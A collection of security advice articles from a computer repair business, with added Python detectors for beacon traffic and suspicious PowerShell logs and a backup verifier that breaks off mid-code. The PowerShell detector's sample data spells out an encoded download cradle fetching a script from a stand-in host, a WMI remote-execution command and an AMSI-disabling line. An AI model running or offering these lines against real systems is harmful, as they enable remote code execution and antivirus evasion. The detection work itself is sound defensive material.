Current Computer Security Landscape

Article (PSA‑0029)

Why This Matters

Every computer – whether it lives in a home office or a corporate data‑center – is a potential target for criminals seeking money or data. In October 2023 ransomware attacks were 66 % higher than a year earlier (Symantec). This increase shows how lucrative “locking you out” of your own files has become.

What Is Malware?

Malware is malicious software. It is a catch‑all term for any program that harms a computer without the user’s consent. The most common families are listed below.

Common Ways Malware Gets In

  • Infected email attachments
  • Compromised USB or thumb drives
  • Software downloaded from the internet
  • Links in emails, social‑media posts, or chat messages
  • Abuse of legitimate Windows tools and features (the “living‑off‑the‑land” technique), so that nothing obviously malicious has to be downloaded at all

Typical Malware Types (brief)

  • Viruses – Replicate themselves, slow or cripple a system, and can delete or corrupt files.
  • Spyware / Keyloggers – Record what you type and steal passwords, banking information, etc.
  • Adware – Show unwanted ads; sometimes the ads contain malicious links.
  • Scareware – Pretend to be an antivirus, claim you’re infected, and try to sell fake cleanup software.
  • Ransomware – Encrypt files and demand a ransom to unlock them. Often follows another infection.
  • Botnets – Networks of compromised computers used for spam, DDoS attacks, and other large‑scale threats.

How Attackers Do It Today

Recent research (Symantec) shows the main infection route is no longer massive botnets but exploiting known vulnerabilities in publicly‑facing applications. Attackers increasingly use legitimate Windows tools—remote‑desktop programs, PowerShell scripts, or built‑in admin utilities—to move laterally across a network. Because these tools appear normal, traditional antivirus signatures often miss them.

Why Everyone—Home or Business—Should Care

  • Financial loss – Ransom payments, fraud, or the cost of data recovery.
  • Legal risk – Breached customer data can trigger fines and lawsuits.
  • Reputation damage – Clients lose trust when you can’t protect their information.
  • Personal impact – Family photos, tax records, and other irreplaceable files could disappear.

Basic Steps to Stay Safe (Quick Checklist)

  • ✔️ Keep software up to date. Enable automatic Windows updates and patch third‑party applications.
  • ✔️ Use a reputable antivirus/antispyware suite and keep its definitions current.
  • ✔️ Enable the built‑in Windows firewall (or a trusted third‑party firewall).
  • ✔️ Back up important files regularly – at least weekly, using an external drive or a cloud service with versioning.
  • ✔️ Be skeptical of unexpected emails, links, or attachments. Hover to see the real URL before clicking.
  • ✔️ Limit admin privileges. Use a standard (non‑administrator) account for everyday activities.

If You Suspect an Infection

  • Disconnect the computer from the internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with your security suite.
  • If ransomware messages appear, do NOT pay the ransom. Contact a professional (see phone number below).
  • Restore files from a clean backup if possible.
  • Change passwords for any accounts that may have been compromised.

Need Help Now?

If you think your PC is infected or you have questions about securing your network, call us at (707) 506‑6802 to speak with a technician.

Security Update – 2019

Article (PSA‑0011)

Why 2017 Was a Wake‑Up Call

From the rapid spread of WannaCry and NotPetya ransomware to the explosion of illicit cryptocurrency miners, 2017 reminded us that cyber‑threats can appear from unexpected places. Each year the quantity and variety of threats increase, and attackers continuously develop new ways to infiltrate devices while covering their tracks.

Key Threat Statistics (2017‑2023 Trend Highlights)

  • Ransomware – New ransomware variants rose 46 % in 2017 (Symantec ISTR 2018), and ransomware has stayed among the leading breach actions in every Verizon DBIR since.
  • Cryptocurrency miners – Symantec reported an 8,500 % increase in miner detections from 2016 to 2017; the trend continues with modern “cryptojacking” scripts on compromised websites.
  • Downloader families – + 92 % new variants reported in 2017; these “dropper” programs fetch additional malware after initial infection.
  • Mac malware – + 80 % new threats in 2017, and the numbers have kept climbing as macOS market share grows.

What Is Malware?

“Malware” = malicious software. It’s an umbrella term for any program that infects a computer without the user’s consent, including viruses, ransomware, spyware, ad‑ware, trojans, and cryptominers.

Common Infection Vectors (non‑exhaustive)

  • Infected email attachments.
  • Compromised USB thumb drives or external disks.
  • Downloads from untrusted websites or pirated software.
  • Malicious links in email, social‑media posts, instant‑message chats.
  • Drive‑by downloads via compromised legitimate‑looking websites (malvertising).

For a full glossary of terms, see our Threat Glossary.

Do You Need to Worry About Malware?

Absolutely. Cyber‑crime targets anyone with an Internet‑connected device—home users, small businesses, and large enterprises alike.

  • Business impact: A breach can expose customer data, trigger legal penalties (GDPR, HIPAA, PCI‑DSS), and damage reputation.
  • Personal impact: Family photos, financial documents, and personal communications can be stolen, encrypted, or deleted.
  • Year after year the Verizon DBIR puts stolen credentials and phishing among the top ways attackers get in, which means the weak points are ordinary accounts and inboxes, not exotic exploits.

Basic Protection Checklist (Start Here)

  1. Keep software updated. Enable automatic Windows/macOS updates, and patch third‑party apps as soon as patches appear.
  2. Use reputable antivirus/anti‑malware. Microsoft Defender (Windows 10/11) or a trusted third‑party solution (Bitdefender, Malwarebytes, ESET).
  3. Enable a firewall. Built‑in OS firewall is sufficient for most home users; ensure it’s turned on.
  4. Practice safe browsing. Don’t click unknown links, verify URLs, and avoid downloading from untrusted sites.
  5. Secure email. Use spam filters, enable MFA on email accounts, and never open unexpected attachments.
  6. Back up your data. Follow the 3‑2‑1‑0 rule (three copies, two media types, one off‑site, zero errors – meaning you actually test that a restore works, not just that the backup job finished).
  7. Enable multi‑factor authentication (MFA) on any cloud service, VPN, and privileged accounts.

What to Do If You Suspect an Infection

  • Disconnect the device from the Internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with an up‑to‑date anti‑malware product.
  • If the scan reports ransomware or a serious threat, isolate the machine and consider professional remediation.
  • Change passwords for any accounts accessed from the infected device (preferably from a clean device).
  • Restore files from a recent, verified backup if they have been encrypted or corrupted.

2025 Update – New Threat Landscape & Mitigations

Since the original 2017‑2023 overview, several important developments have reshaped the threat environment. Below is a concise addendum you can use to keep the article current.

1️⃣ Ransomware‑as‑a‑Service (RaaS) is Mainstream

  • Ransomware‑as‑a‑service platforms (e.g., LockBit, Hive, BlackCat/ALPHV) let low‑skill affiliates launch attacks in exchange for a share of the ransom.
  • The 2024 Verizon DBIR found ransomware or another extortion technique in roughly one third of breaches, and operators now routinely steal data before encrypting it so they can also threaten publication (“double extortion”).
  • Mitigation: Deploy **endpoint detection & response (EDR)** solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) that can detect malicious behavior before encryption begins; maintain immutable (write‑once, read‑many) or offline backups so that recovery never depends on paying.

2️⃣ AI‑Generated Phishing & Deepfake Social Engineering

  • Large‑language models are being used to craft hyper‑personalized phishing emails that bypass traditional keyword filters.
  • Deepfake video/audio calls are increasingly used to impersonate executives (“CEO fraud”).
  • Mitigation: Authenticate your outbound mail (SPF, DKIM and a DMARC policy of quarantine or reject – p=none only reports), train staff with regular simulated phishing campaigns, enforce MFA for all privileged accounts, and require an out‑of‑band call‑back to a known number before acting on any urgent payment or credential request, however convincing the voice or video looks.

3️⃣ Supply‑Chain & Software‑Update Attacks

  • Since the 2020 SolarWinds breach, attackers have focused on compromising software update mechanisms and build pipelines, because a single trusted update reaches every customer at once.
  • Mitigation: Verify code signatures and the publisher identity before installing updates, enable **code‑signing integrity checks**, compare downloads against the vendor's published hashes where they are offered, and limit admin rights on update tools.

4️⃣ Cryptojacking Evolution

  • Browser‑based cryptojacking scripts now target **WebAssembly** for higher hash rates, often delivered via compromised ad‑networks.
  • Mobile devices are also being hijacked to mine Monero via malicious apps.
  • Mitigation: Use browser extensions that block crypto‑mining scripts (e.g., uBlock Origin, NoScript), keep browsers and plug‑ins up to date, and run mobile anti‑malware scans.

5️⃣ Rise of “File‑less” Malware & Living‑off‑the‑Land (LotL) Techniques

  • Attackers increasingly leverage legitimate OS utilities (PowerShell, Windows Management Instrumentation, Office macros) to execute payloads without dropping a file on disk.
  • Mitigation: Enable **Windows Defender Exploit Guard** (Attack Surface Reduction rules), enforce **Application Control** (AppLocker or Microsoft Defender Application Control), turn on PowerShell script‑block and module logging so that what actually ran is recorded, and use Constrained Language Mode for non‑admin users. Note that the PowerShell execution policy is a safety setting, not a security boundary: it is bypassed with a single command‑line switch, so do not count it as a control.

6️⃣ Enhanced Defensive Technologies (2025)

  • Microsoft Defender XDR (formerly Microsoft 365 Defender) integrates email, endpoint, identity, and cloud app protection using AI‑driven analytics.
  • Zero‑Trust Network Access (ZTNA) replaces traditional VPNs for many businesses, reducing lateral movement risk.
  • Some endpoint platforms offer **automated ransomware rollback** (e.g., SentinelOne's Rollback feature). It relies on Windows Volume Shadow Copies, which most ransomware deletes before encrypting, so treat it as a convenience rather than a replacement for offline or immutable backups.

7️⃣ Updated Statistics (2025)

  • IDC estimates **5.6 billion** devices will be infected with some form of malware by the end of 2025.
  • 2024 Palo Alto Networks report shows a **28 % increase** in credential‑theft attacks targeting remote‑work setups.
  • Cyber‑insurance premiums have risen an average of **23 %** year‑over‑year, reflecting the growing cost of ransomware and data‑breach remediation.

Need Help Right Now?

If you have questions about current threats, want a security assessment, or need assistance cleaning an infected system, call PSA Computer Services at (707) 506‑6802. We’ll help you protect your data and get you back online safely.

How Antivirus & Antispyware Work

Article (PSA‑0004)

If a computer is connected to the Internet it is exposed to a constant stream of files, links, and network traffic. An up‑to‑date **antivirus/antispyware** solution provides the first line of defense by:

  • Scanning files in real time as they are downloaded or executed.
  • Running scheduled deep scans of the entire drive or selected folders.
  • Leveraging constantly‑updated threat definitions and heuristic/AI‑based detection.

Key features you should look for (2025)

  • Real‑time protection – automatically blocks malicious code before it runs.
  • Scheduled full‑disk scans – weekly or bi‑weekly deep scans.
  • Cloud‑based AI/behavioral analysis – catches zero‑day threats that signatures haven’t seen yet.
  • Automatic definition updates – at least daily.
  • Low system impact – runs efficiently on modern hardware without excessive RAM or CPU usage.

Built‑In Windows Options (Free)

  • Windows 10/11 – Microsoft Defender (formerly Windows Defender). Integrated, automatically updated, and provides both antivirus and antispyware protection at no extra cost.
  • Windows 7 – Microsoft Security Essentials (no longer supported after Jan 2020). If you are still on Windows 7, upgrade to a supported OS or use a third‑party solution, because Microsoft no longer provides definition updates for Windows 7.

Third‑Party Solutions (When You Need More)

For businesses or users who want additional features (e.g., ransomware‑specific protection, web‑filtering, centralized management), consider reputable vendors such as:

  • Bitdefender GravityZone
  • Kaspersky Endpoint Security
  • SentinelOne
  • Linux Malware Detect (maldet) + ClamAV (for Linux/UNIX environments)

Why One Antivirus Is Enough

Running more than one real‑time AV/antispyware engine on the same machine creates problems:

  1. Resource contention – Each engine consumes RAM and CPU; the system may start paging to disk, drastically slowing performance.
  2. Software conflicts – Two scanners can flag each other as malicious, leading to false positives, constant alerts, or even system instability.
  3. Cross‑quarantine – One product may quarantine the other’s core files, corrupting the second product and making it difficult to repair.
  4. Licensing overhead – Multiple subscriptions increase cost and administrative effort.

In short, **one well‑chosen, continuously updated product plus a firewall** gives you comprehensive protection without the downsides.

How to Detect an Infection

  • Frequent pop‑ups, unexpected toolbars, or strange system notifications.
  • New icons, programs, or services appearing without your consent.
  • Home‑page changes, unwanted redirects, or DNS hijacking.
  • System slowdown, frequent freezes, or crashes during routine tasks.
  • Unusual outbound network traffic (check with a network monitor or firewall logs).
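The last symptom above, unusual outbound traffic, is the one a home or small‑business user can check with nothing more than firewall logs. As an added example (not code from the article), the script below reads constructed firewall log lines, keeps only permitted LAN‑to‑internet connections, and flags any flow whose connection intervals are too regular to be human: a command‑and‑control implant checks in on a timer, so even with jitter the spread of its intervals stays small relative to the mean. The log format, addresses and thresholds are assumptions; a real log (Windows Firewall pfirewall.log, pf, nftables) needs its own one‑line parser and tuning.

```python
"""Find beacon-like outbound flows in firewall log lines.

Added example, not from the article. The log format and addresses are
constructed; real logs (Windows Firewall pfirewall.log, pf, nftables) need
their own one-line parser, and the thresholds should be tuned to your network.
"""
from __future__ import annotations

import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

# Fields per constructed line: timestamp action proto src dst dport
SAMPLE_LOG = """\
2025-03-01T09:00:00 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:00:03 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:00:07 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:01:02 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:01:08 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:02:06 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:02:30 DROP TCP 203.0.113.99 192.168.1.20 3389
2025-03-01T09:03:07 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:04:09 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:04:40 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:04:41 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:05:06 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:06:07 ALLOW TCP 192.168.1.20 203.0.113.50 443
2025-03-01T09:06:30 ALLOW TCP 192.168.1.20 198.51.100.10 443
2025-03-01T09:07:08 ALLOW TCP 192.168.1.20 203.0.113.50 443
"""

# RFC 1918 ranges; checked explicitly rather than via ip.is_private, which also
# treats documentation ranges such as 203.0.113.0/24 as private.
LAN = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_lan(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LAN)


def parse_line(line: str) -> tuple[datetime, str, str, str, str, int]:
    ts, action, proto, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), action, proto, src, dst, int(dport)


def find_beacons(log_text: str, min_connections: int = 6, max_cv: float = 0.15) -> dict[tuple[str, str, int], float]:
    """Return {(src, dst, dport): mean_gap_seconds} for outbound flows with near-constant timing.

    The coefficient of variation (stdev / mean) of the inter-connection gaps is
    small for a timer-driven implant and large for bursty, human-driven traffic.
    """
    stamps: dict[tuple[str, str, int], list[datetime]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, action, _proto, src, dst, dport = parse_line(line)
        if action != "ALLOW" or not is_lan(src) or is_lan(dst):
            continue  # only permitted LAN-to-internet traffic can be a beacon
        stamps[(src, dst, dport)].append(ts)
    beacons: dict[tuple[str, str, int], float] = {}
    for key, times in stamps.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            beacons[key] = round(mean, 1)
    return beacons


if __name__ == "__main__":
    for (src, dst, port), gap in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {dst}:{port} every ~{gap}s")
```

In the constructed log the browsing to 198.51.100.10 is irregular and is ignored, while the once‑a‑minute flow to 203.0.113.50 is reported. Port 443 is deliberate: modern implants hide in HTTPS, so the destination and the rhythm, not the port, are the tell. A legitimate updater or monitoring agent also beacons, so every hit still needs a human to decide what the process on that host actually is.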

Step‑by‑Step Response If You Suspect Malware

  1. Update definitions – Ensure both AV and antispyware engines have the latest signature database.
  2. Run a full system scan – Allow the scan to complete; it may take 30 minutes to several hours depending on data size.
  3. Follow the removal instructions – Quarantine or delete the identified items, then reboot if prompted.
  4. Re‑scan – After the reboot, run another full scan to confirm the system is clean.
  5. Check startup items & scheduled tasks – Use Task Manager's Startup tab, Task Scheduler, or Sysinternals Autoruns (Windows), or systemctl list‑unit‑files and the crontabs (Linux), to verify nothing suspicious is set to launch automatically. Malware that survives a reboot almost always has an entry in one of these places.
  6. Change passwords – If you suspect credential theft, reset passwords on a clean device, especially for email, banking, and admin accounts.
  7. Restore from backup (if needed) – If the infection cannot be fully removed, revert to a known‑good backup.

When Professional Help Is Needed

If the malware persists after multiple scans, re‑appears after a reboot, or has caused system instability, you should consult a qualified IT service provider. PSA Computer Services offers a **“no‑fix, no‑pay” guarantee** – you only pay for successful remediation.

Best‑Practice Checklist

  • Enable built‑in Windows Defender (or a reputable third‑party solution) with real‑time protection.
  • Keep OS and all applications patched – enable automatic updates.
  • Schedule weekly full scans and daily definition updates.
  • Use a hardware or software firewall with inbound blocking and outbound monitoring.
  • Practice safe browsing: avoid unknown links, make sure the site uses HTTPS with a valid certificate, and use a reputable browser that is kept up to date.
  • Back up critical data using the 3‑2‑1‑0 rule; test restore procedures quarterly.
  • Enable multi‑factor authentication on all cloud accounts.

Bottom Line

No home or business should operate without a modern, regularly updated antivirus/antispyware solution and a firewall. One well‑maintained product, coupled with common‑sense habits (patching, backups, MFA), provides strong protection without the performance penalties and conflicts of running multiple overlapping tools.

Need a Reliable Antivirus Solution or a Clean‑Up?

Call PSA Computer Services at (707) 506‑6228 for a free assessment, installation, or infection remediation. We’ll get you protected quickly and affordably.

Introduction to Malicious Software

Article (PSA‑0003) – Updated 2025

Even after a decade of rapid growth, malware remains the primary vector for data theft, ransomware, and large‑scale cyber‑crime. Recent industry reports illustrate the scale:

  • Symantec (Broadcom) 2024 Threat Report – > 1 billion new malicious files detected in the last 12 months, a 12 % increase over 2023.
  • Kaspersky 2024 Security Bulletin – ≈ 3 million + malware‑related alerts per day, with a 45 % rise in ransomware attempts.
  • Microsoft 2024 Digital Threat Landscape – Cryptojacking incidents grew 87 % YoY, and “file‑less” attacks now account for ≈ 30 % of all detections on Windows platforms.

All of these numbers point to a single truth: malware is a money‑making industry. Attackers steal personal data and financial credentials, then leverage compromised machines to launch further attacks, sell access, or extort victims.

What Is Malware?

Malware = malicious software – a blanket term for any program that infiltrates a system without the user’s consent. It includes, but is not limited to, viruses, spyware, adware, ransomware, botnets, cryptominers, and file‑less payloads.

Common infection vectors (still relevant)

  • Infected email attachments or malicious links in phishing messages.
  • Compromised USB/thumb drives and other removable media.
  • Downloads from untrusted websites or pirated software.
  • Drive‑by downloads via compromised legitimate sites (malvertising).
  • Supply‑chain compromises – malicious code injected into trusted software updates (e.g., SolarWinds Orion in 2020, the trojanized 3CX desktop client in 2023).

Malware Categories – 2025 Edition

  • Viruses – Self‑replicating code that can corrupt files and degrade system performance.
  • Spyware / Keyloggers – Record user input, screenshots, or system activity to steal credentials.
  • Adware – Serve unwanted advertisements, often bundled with free software.
  • Scareware – Pretend to be a legitimate security product, coercing users into paying for fake fixes.
  • Ransomware – Encrypt files and demand payment; modern variants (e.g., LockBit 2.0, Hive) include “double‑extortion” – stealing data and threatening public release.
  • Botnets – Networks of compromised devices used for spam, DDoS attacks, or credential‑stuffing.
  • Cryptominers (Cryptojacking) – Hijack CPU/GPU cycles to mine cryptocurrency without the user’s knowledge.
  • File‑less (Living‑off‑the‑Land) malware – Execute malicious code in memory using legitimate OS tools (PowerShell, WMI, mshta, rundll32, regsvr32). Little or nothing is written to disk, so file‑based AV signatures rarely trigger; detection depends on logging and behaviour monitoring instead.
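Because file‑less malware leaves no file to scan, the “How Attackers Do It Today” passage above and the living‑off‑the‑land item in the 2025 addendum both come down to the same question: what does the detection actually look at? The answer is the command lines and script text that Windows records once PowerShell script‑block logging is on (event ID 4104). As an added example (not code from the article or from any product), the script below runs a handful of constructed rules over constructed log entries, decoding the base64 behind -EncodedCommand so that a cradle hidden there is still caught. The rule set is an illustrative subset; a real EDR or SIEM carries hundreds.

```python
"""Flag suspicious PowerShell script-block log entries (Windows event ID 4104).

Added example, not code from this article: the log lines are constructed and
the rule list is a small illustrative subset of what an EDR or SIEM would carry.
"""
from __future__ import annotations

import base64
import re

# (rule name, pattern) pairs, matched case-insensitively against the script text.
RULES = [
    ("download_cradle", re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer|\biwr\b", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("wmi_process_create", re.compile(r"Win32_Process.*\bCreate\b", re.I)),
    ("reflective_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I)),
    ("amsi_tamper", re.compile(r"amsi(Utils|InitFailed|ScanBuffer)", re.I)),
]
# -e, -ec, -enc, -EncodedCommand (PowerShell accepts any unique prefix) followed by a long base64 blob.
_ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(line: str) -> str | None:
    """Return the plaintext behind an -EncodedCommand argument (UTF-16LE base64), else None."""
    m = _ENCODED.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(line: str) -> list[str]:
    """Return the names of every rule the line, or its decoded payload, triggers."""
    findings: list[str] = []
    decoded = decode_encoded_command(line)
    if decoded is not None:
        findings.append("encoded_command")
    haystack = line if decoded is None else f"{line}\n{decoded}"
    findings.extend(name for name, rx in RULES if rx.search(haystack))
    return findings


def analyze(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for each line that triggered at least one rule."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := score_script_block(line))]


# Constructed sample entries. The payload is encoded here the same way an
# attacker encodes it, so the raw log line carries no readable keywords.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LINES = [
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",                         # benign admin work
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + ENCODED,  # obfuscated download cradle
    "Invoke-WmiMethod -ComputerName FS01 -Class Win32_Process -Name Create "
    "-ArgumentList 'cmd /c whoami'",                                             # lateral movement over WMI
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",      # AMSI bypass attempt
]

if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_LINES):
        print(f"line {idx}: {', '.join(hits)}")
```

The benign directory listing produces no findings; the encoded line is reported for the encoding itself and for the cradle inside it; the WMI line is the remote‑process‑creation step of lateral movement; the last line is an attempt to switch off AMSI, the interface that lets the antivirus see script content in memory. None of these would be found by a signature on a file, which is the whole point of enabling the logging first.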

Do You Need to Worry About Malware?

Yes – both home users and businesses are prime targets. A breach can lead to:

  • Loss or theft of personal photos, family videos, or critical business documents.
  • Financial liability when customer data (PCI, PHI, PII) is exposed.
  • Operational downtime that costs the average small business ≈ $200 k per incident (National Cybersecurity Center, 2024).
  • Ransom payments (average ≈ $300 k in 2024) and the associated loss of trust.

How to Protect Yourself – Updated Best Practices (2025)

  1. Keep the operating system and all software patched. Enable automatic updates wherever possible.
  2. Use a reputable, actively‑maintained antivirus/antispyware solution. Choose products that combine signature‑based detection with AI/behavioral analysis (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone, SentinelOne).
  3. Enable a host‑based firewall. Windows Defender Firewall or macOS Application Firewall should be on with default “block inbound unless requested” rules.
  4. Employ multi‑factor authentication (MFA) on all cloud and privileged accounts.
  5. Back up data using the 3‑2‑1‑0 rule. Verify backups quarterly and store at least one copy immutable.
  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and malware‑blocking DNS resolvers (e.g., Quad9 or Cloudflare's 1.1.1.1 for Families) add another layer of defense by refusing to resolve known‑bad domains.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

Security, Is More Better?

Article (PSA‑0002)

Security requirements vary by how a computer is used. For a quick assessment you can split the environment into two categories:

  • Online (Internet‑connected) devices – need real‑time threat detection and a firewall.
  • Offline (stand‑alone) devices – may need fewer safeguards, but still require some protection if they ever exchange media with other systems.

1️⃣ Online Devices – Core Requirements

Antivirus / Antimalware

A modern, licensed solution that provides both **real‑time** and **scheduled** scanning is essential.

  • Real‑time scanning – Monitors files as they are created, downloaded, or executed and blocks known threats instantly.
  • Scheduled scanning – Performs a deep scan of the entire drive (or selected folders) on a regular basis (daily, weekly, or monthly) to catch dormant or missed malware.
Built‑in options (2025)
  • Windows 10/11 – Microsoft Defender – Free, always‑on, cloud‑assisted, and centrally manageable via Microsoft Intune.
  • macOS – XProtect + Gatekeeper – Native malware detection and notarization checks for downloaded apps.
  • Linux – ClamAV or a commercial EDR agent – Useful for servers or workstations that run Linux.
When to consider a third‑party solution

If you need additional features such as ransomware‑specific protection, web‑filtering, or centralized reporting for multiple endpoints, look at reputable vendors like Bitdefender GravityZone, SentinelOne, or ESET Endpoint Security.

Firewall

A firewall controls inbound and outbound traffic based on a set of rules. Two layers are common:

  • Software firewall – Built into the OS (Windows Defender Firewall, macOS Application Firewall, Linux UFW/nftables). It blocks unsolicited inbound connections and can restrict outbound traffic.
  • Hardware firewall – The router or a dedicated appliance (e.g., Ubiquiti EdgeRouter, Cisco Meraki, or a commercial NGFW – Next‑Generation Firewall). It adds network‑level filtering and NAT, keeping the entire LAN hidden from the Internet.

For most home users and small businesses the combination of the OS firewall plus the router’s NAT/packet‑filter is more than adequate.

2️⃣ Offline (Never‑Connected) Devices – What to Consider

If a computer truly never touches the Internet and never receives files from another network, you can forego a full‑time antivirus program. However, keep these points in mind:

  • Even removable media (USB sticks, external HDDs) can carry malware. Scan any media before it is introduced to an offline system.
  • Use an on‑demand scan for occasional checks (e.g., Microsoft Defender Offline, which boots into a clean environment before Windows loads); refresh its definitions with the manually downloaded update package, carried over on media that has itself been scanned.
  • Maintain a strict air‑gap policy: keep the device physically separated and disable any wireless adapters.

Why One Security Suite Is Usually Enough

Running multiple antivirus products on the same machine creates more problems than it solves. The most common issues are:

  1. RAM depletion – Each engine consumes memory. When RAM runs out the OS starts paging to disk, causing severe slow‑downs.
  2. Software conflicts – Two real‑time scanners can flag each other’s activity as malicious, leading to endless alerts and potential system instability.
  3. Quarantine of critical files – One product may mistakenly quarantine the other’s core components, leaving both programs corrupted.
  4. Administrative overhead – Managing multiple licences, updates, and alert streams is time‑consuming and costly.

For the vast majority of users, **one up‑to‑date antivirus/antispyware product plus a properly configured firewall** provides comprehensive protection.

Practical Checklist – Get Secure in Minutes

  • Enable the built‑in OS firewall. Verify that inbound connections are blocked unless you explicitly allow them.
  • Install a reputable antivirus. If you’re on Windows 10/11, make sure Microsoft Defender is turned on and receiving updates.
  • Schedule a weekly full scan. Set the scan for off‑hours to avoid interrupting work.
  • Keep the system patched. Enable automatic OS updates and apply vendor patches for all installed software.
  • Use strong, unique passwords and enable multi‑factor authentication (MFA) on all cloud accounts.
  • Back up your data. Apply the 3‑2‑1‑0 rule (see PSA‑0005) and test restores quarterly.
  • Limit admin privileges. Operate daily tasks as a standard user; reserve Administrator rights for installs and system changes.
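The “0” in the 3‑2‑1‑0 rule, which this checklist and the ones in PSA‑0011 and PSA‑0003 all lean on, is the step people skip: checking that the backup actually contains what the source contains. As an added example (not the article's code, and not tied to any backup product), the script below compares a source tree with its backup file by file using SHA‑256, so that a truncated, corrupted, missing or stale copy is reported even when its name, size and timestamp look right. It builds a throwaway source tree and a deliberately flawed backup in a temporary directory so it runs offline; point verify_backup() at your real folders to use it in earnest.

```python
"""Verify a backup against its source file by file (the "zero errors" in 3-2-1-0).

Added example, not the article's code. It builds a throwaway source tree and
a deliberately flawed backup of it in a temporary directory so it runs
offline; point verify_backup() at real paths to use it for real.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in 1 MiB chunks so large archives don't need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_backup(source: Path, backup: Path) -> dict[str, list[str]]:
    """Compare every file under source with its counterpart under backup.

    Returns relative paths grouped as ok / missing / mismatched / extra.
    Sizes and timestamps are ignored on purpose: a bit-rotted or silently
    truncated copy can keep both, and only the content hash catches it.
    """
    report: dict[str, list[str]] = {"ok": [], "missing": [], "mismatched": [], "extra": []}
    src_files = {p.relative_to(source).as_posix() for p in source.rglob("*") if p.is_file()}
    dst_files = {p.relative_to(backup).as_posix() for p in backup.rglob("*") if p.is_file()}
    for rel in sorted(src_files):
        if rel not in dst_files:
            report["missing"].append(rel)
        elif sha256_of(source / rel) != sha256_of(backup / rel):
            report["mismatched"].append(rel)
        else:
            report["ok"].append(rel)
    report["extra"] = sorted(dst_files - src_files)  # only in the backup: stale, or planted
    return report


def build_demo_trees(root: Path) -> tuple[Path, Path]:
    """Create constructed sample data: a source tree and a backup with three defects."""
    src, dst = root / "source", root / "backup"
    (src / "docs").mkdir(parents=True)
    (dst / "docs").mkdir(parents=True)
    files = {
        "docs/taxes-2024.pdf": b"%PDF-1.7 tax return bytes",
        "docs/notes.txt": b"remember to renew the domain",
        "photo.jpg": b"\xff\xd8\xff\xe0 jpeg bytes",
    }
    for rel, data in files.items():
        (src / rel).write_bytes(data)
        (dst / rel).write_bytes(data)
    (dst / "docs/notes.txt").write_bytes(b"remember to renew the domai")  # truncated copy
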